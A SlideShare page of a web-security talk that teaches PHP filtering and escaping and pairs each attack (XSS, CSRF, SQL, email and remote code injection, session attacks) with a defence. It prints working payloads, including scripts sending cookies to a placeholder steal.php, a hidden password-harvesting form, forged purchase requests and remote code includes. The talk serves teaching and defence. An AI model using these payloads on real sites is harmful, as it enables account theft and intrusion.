SlideShare a Scribd company logo
Evolution of
Web Security
    Chris Shiflett
@shiflett • shiflett.org
Web developer from Brooklyn, NY, and
Who am I?   founding member of Analog, a web design
            & development co-operative.
1. Fundamentals
Three Principles


Defense in depth
— Redundant safeguards are valuable.


Least privilege
— Grant as little freedom as possible.


Least complicated
— Complexity breeds mistakes.
Two Practices



Filter input.
— Ensure data coming in is valid.


Escape output.
— Ensure data going out is not misinterpreted.
Filter input. Escape output.




      Filter   Application   Escape
<?php

$clean = array();

if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
} else {
    /* Error */
}

?>
<?php

$clean = array();

switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
        $clean['color'] = $_POST['color'];
        break;
    default:
        /* Error */
        break;
}

?>
<?php

$clean = array();

$colors = array('red', 'green', 'blue');

if (in_array($_POST['color'], $colors)) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}

?>
<?php

$clean = array();
$colors = array();

$colors['red'] = '';
$colors['green'] = '';
$colors['blue'] = '';

if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}

?>
<?php

$clean = array();

if (preg_match('/^d{5}$/',
    $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
} else {
    /* Error */
}

?>
<?php

/* Content-Type: text/html; charset=UTF-8' */

$html = array();

$html['user'] = htmlentities($clean['user'],
                ENT_QUOTES,
                'UTF-8');

echo "<p>Welcome, {$html['user']}.</p>";

?>
Evolution Of Web Security
Exploits
Cross-Site          Session
Scripting           Hijacking

Cross-Site          Email Injection
Request
Forgeries           Remote Code
                    Injection
SQL Injection

Session Fixation
Cross-Site Scripting

            1              2




                          HTML
Attacker   XSS   Target          Victim
                          XSS
echo $_GET['user'];




http://host/foo.php?user=%3Cscript%3E…




          echo '<script>…';
Steal Cookies


<script>
document.location =
    'http://host/steal.php?cookies=' +
    encodeURI(document.cookie);
</script>
Steal Passwords


<script>
document.forms[0].action =
'http://host/steal.php';
</script>
Steal Saved Passwords


<form name="steal" action="http://host/steal.php">

<input type="text" name="username"
    style="display: none" />
<input type="password" name="password"
    style="display: none" />

<input type="image" src="image.png" />
</form>
Short & Simple


<script src="http://host/evil.js"></script>
Character Encoding


$string = "<script>alert('XSS');</script>";
$string = mb_convert_encoding($string, 'UTF-7');
 
echo htmlentities($string);




             Google XSS Example
     http://shiflett.org/blog/2005/dec/google-xss-example
Stop It!

FIEO.

Use valid HTML.
— http://validator.w3.org/


Use existing solutions.
— PHP developers, use htmlentities() or htmlspecialchars().
— Make sure you indicate the character encoding!


Need to allow HTML?
— Use HTML Purifier, even if you’re not using PHP:
  http://htmlpurifier.org/
Cross-Site Request Forgeries

             1             2




  Attacker   ?   Victim   CSRF   Target
CSRF


Because the attack is carried out by
the victim, CSRF can bypass:
— HTTP auth
— Session-based auth
— Firewalls
— &c.
<form action="buy.php" method="post">
                     <input type="hidden" name="isbn"
                         value="059600656X" />
                     <input type="submit" value="Buy" />
                     </form>
    Buy




POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
Forging GET

<img src="http://host/buy.php?isbn=059600656X" />




GET /buy.php?isbn=059600656X HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Forging POST
<iframe style="visibility: hidden" name="secret"></iframe>

<form name="buy" action="http://host/buy.php" method="post" target="secret">
<input type="hidden" name="isbn" value="059600656X" />
</form>

<script type="text/javascript">document.buy.submit();</script>




POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
CSRF Exploits


  Amazon (Fixed?)
 http://shiflett.org/amazon.php




      Digg (Fixed)
  http://4diggers.blogspot.com/
Steal Cookies (Improved)


 <script>
 new Image().src =
     'http://host/steal.php?cookies=' +
     encodeURI(document.cookie);
 </script>
Stop It!

$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
$html['token'] = htmlentities($token, ENT_QUOTES,
                 'UTF-8');




<input type="hidden"
       name="token"
       value="<?php echo $html['token']; ?>" />
SQL Injection

            1              2




                          SQL
Attacker   SQL   Target         Database
                          SQL
SELECT   count(*)
FROM     users
WHERE    username = '{$_POST['username']}'
AND      password = '…'




                      chris' /*




SELECT   count(*)
FROM     users
WHERE    username = 'chris' /*'
AND      password = '…'
Stop It!


         FIEO.

         Use prepared statements.
         — PHP developers, use PDO.




addslashes() Versus mysql_real_escape_string()
 http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
Session Fixation



http://host/login.php?PHPSESSID=1234
Stop It!


Regenerate the session identifier.
— PHP developers, session_regenerate_id(TRUE).


Do this whenever the privilege level
changes.
Session Hijacking

Attacker impersonates a victim.

In PHP, by default, only requires a valid
session identifier.

Session identifier obtained using:
— Prediction
— Capture
— Fixation
Stop It!

Understand how sessions work.

Minimize session identifier exposure.
— SSL
— Separate domain for embedded resources


Trending
— https://panopticlick.eff.org/
— More on this later…
Email Injection
mail('chris@example.org', 'Feedback', '...',
     "From: {$_POST['email']}");




fake@example.orgrnBcc: victim@example.orgrnBcc: …




To: chris@example.org
Subject: Feedback
From: fake@example.org
Bcc: victim@example.org
Bcc: …
Stop It!



FIEO.
— http://iamcal.com/publish/articles/php/parsing_email
— PHP developers, use ctype_print() as defense in depth.
Remote Code Injection




  Attacker     Target
include "{$_COOKIE['type']}.php";




 Cookie: type=http://host/inject.inc?




include "http://host/inject.inc?.php";
Remote Code Injection



This example exploits allow_url_fopen.

PHP 5 has allow_url_include.
— By default, allow_url_include is disabled.
include "{$_GET['type']}.php";




POST /script.php?type=php://input%00 HTTP/1.1
Host: host
Content-Type: application/x-www-form-urlencoded
Content-Length: ?

?




include "php://input";
Stop It!



FIEO.
— If at all possible, use a white list.
2. Emerging Trends
Ajax


“The name is shorthand for Asynchronous
   JavaScript + XML, and it represents a
  fundamental shift in what’s possible on
                 the Web.”

         — Jesse James Garrett
Ajax


  “Client-side techniques & technologies
    that allow two-way communication
between the client and the server without
            reloading the page.”
Cross-Domain Ajax


Victim
         1. XMLHttpRequest
                                              Target
         2. HTML form + victim’s token
 JS
         3. XMLHttpRequest + victim’s token
XSS + Ajax + CSRF


Victim
         1. XMLHttpRequest
                                              Target
         2. HTML form + victim’s token
 XSS
         3. XMLHttpRequest + victim’s token
Worms

XSS is a perfect platform for CSRF.

CSRF attacks can exploit XSS
vulnerabilities.

Victims can become attackers.

Rinse. Repeat.
Browser Hijacking
http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking




 Myspace CSRF and XSS Worm (Samy)
http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Cross-Domain Ajax


<cross-domain-policy>
    <allow-access-from domain="*"/>
</cross-domain-policy>




               Thanks, Flash!
Cross-Domain Ajax

   domain="*"    API domain      Vulnerable?


      No         yahoo.com           No


      No        youtube.com          No


      Yes       api.flickr.com       No


     Yes No      adobe.com         Yes No
JavaScript Hijacking

           1             2




Attacker   ?   Victim   CSRF   Target




           4             3
<script src="http://host/json.php"></script>




     [{"email": "chris@shiflett.org"}]




     JavaScript Hijacking Demo
          http://mochikit.com/fortify_fud/
JavaScript Hijacking


 “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
 Moreover, the well-known, pre-existing
exploits for CSRF are actually worse than
               this attack.”

           — Thomas Ptacek
3. Ideas for the Future
Trending
   “When you visit a web site, you are
    allowing that site to access a lot of
   information about your computer’s
configuration. Combined, this information
   can create a kind of fingerprint — a
 signature that could be used to identify
         you and your computer.”

                Panopticlick
             https://panopticlick.eff.org/
Trending



“Not the intent, but Panopticlick from @eff
  would be useful for preventing session
                 hijacking.”
      — http://twitter.com/shiflett/status/8562663352
Trending

Establish trends to help detect
anomalies.

Trends can be based on identity or
behavior.

Trending is imperfect; use as defense in
depth.
Security-Centered Design

        Webstock 2010

     Thursday, 18 February
      After lunch (13:25)

         Illot Theatre
Slides


         http://slideshare.net/shiflett


http://shiflett.org/evolution-of-web-security.pdf
Feedback?

Follow me on Twitter.
— @shiflett


Comment on my blog.
— shiflett.org


Email me.
— chris@shiflett.org


Work with me.
— analog.coop

More Related Content

What's hot

HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
Ismael Goncalves
 
Xss ppt
Xss pptXss ppt
Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
kandelrc
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
RootedCON
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
Megha Sahu
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
Gaurav Sharma
 
WAFs.pptx
WAFs.pptxWAFs.pptx
WAFs.pptx
HamzaJamil41
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
Marco Morana
 
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
Alphorm
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration Testing
Mohammed Adam
 
Web security
Web securityWeb security
Web security
Muhammad Usman
 
Web security ppt sniper corporation
Web security ppt   sniper corporationWeb security ppt   sniper corporation
Web security ppt sniper corporation
sharmaakash1881
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical Security
Nicholas Davis
 
Malicious software and software security
Malicious software and software  securityMalicious software and software  security
Malicious software and software security
G Prachi
 
Information Security
Information SecurityInformation Security
Information Security
Dr. Himanshu Gupta
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
Romansh Yadav
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel Exploitation
zeroSteiner
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
Zakaria SMAHI
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
EC-Council
 
Web security
Web securityWeb security
Web security
Padam Banthia
 

What's hot (20)

HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
WAFs.pptx
WAFs.pptxWAFs.pptx
WAFs.pptx
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
 
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
Alphorm.com Formation Techniques de Blue Teaming : L'Essentiel pour l'Analyst...
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration Testing
 
Web security
Web securityWeb security
Web security
 
Web security ppt sniper corporation
Web security ppt   sniper corporationWeb security ppt   sniper corporation
Web security ppt sniper corporation
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical Security
 
Malicious software and software security
Malicious software and software  securityMalicious software and software  security
Malicious software and software security
 
Information Security
Information SecurityInformation Security
Information Security
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel Exploitation
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 
Web security
Web securityWeb security
Web security
 

Viewers also liked

Web Security
Web SecurityWeb Security
Web Security
Tripad M
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered Design
Chris Shiflett
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
Jose Mato
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
jakobkorherr
 
Web Security
Web SecurityWeb Security
Web Security
Gerald Villorente
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and Cloud
ITDogadjaji.com
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
Cisco Canada
 
Web Security
Web SecurityWeb Security
Web Security
Randy Connolly
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web Security
Bill Condo
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
Sperasoft
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
jeyaselvir
 
Web security
Web securityWeb security
Web security
rakesh bandaru
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
Steven Cahill
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Ynon Perek
 
Extreme security in web servers
Extreme security in  web serversExtreme security in  web servers
Extreme security in web servers
Daniel Garcia (a.k.a cr0hn)
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
Web Security
Web SecurityWeb Security
Web Security
Dipika Bambhaniya
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
dpd
 

Viewers also liked (20)

Web Security
Web SecurityWeb Security
Web Security
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered Design
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Web Security
Web SecurityWeb Security
Web Security
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and Cloud
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web Security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
 
Web security
Web securityWeb security
Web security
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Extreme security in web servers
Extreme security in  web serversExtreme security in  web servers
Extreme security in web servers
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Web Security
Web SecurityWeb Security
Web Security
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 

Similar to Evolution Of Web Security

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Romanian Cyber Conference
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
Haitham Raik
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
XSS
XSSXSS
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
UTD Computer Security Group
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
Akash Mahajan
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
Xchym Hiệp
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
Uri Nativ
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
Mike West
 

Similar to Evolution Of Web Security (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
XSS
XSSXSS
XSS
 
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
 

Recently uploaded

leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
FIDO Alliance
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
alexjohnson7307
 
Step-By-Step Process to Develop a Mobile App From Scratch
Step-By-Step Process to Develop a Mobile App From ScratchStep-By-Step Process to Develop a Mobile App From Scratch
Step-By-Step Process to Develop a Mobile App From Scratch
softsuave
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
KIRAN KV
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
Girls Call Churchgate 9910780858 Provide Best And Top Girl Service And No1 in...
maigasapphire
 
Retrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with RagasRetrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with Ragas
Zilliz
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
Zaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdfZaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdf
AmandaCheung15
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 

Recently uploaded (20)

leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
 
Step-By-Step Process to Develop a Mobile App From Scratch
Step-By-Step Process to Develop a Mobile App From ScratchStep-By-Step Process to Develop a Mobile App From Scratch
Step-By-Step Process to Develop a Mobile App From Scratch
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
 
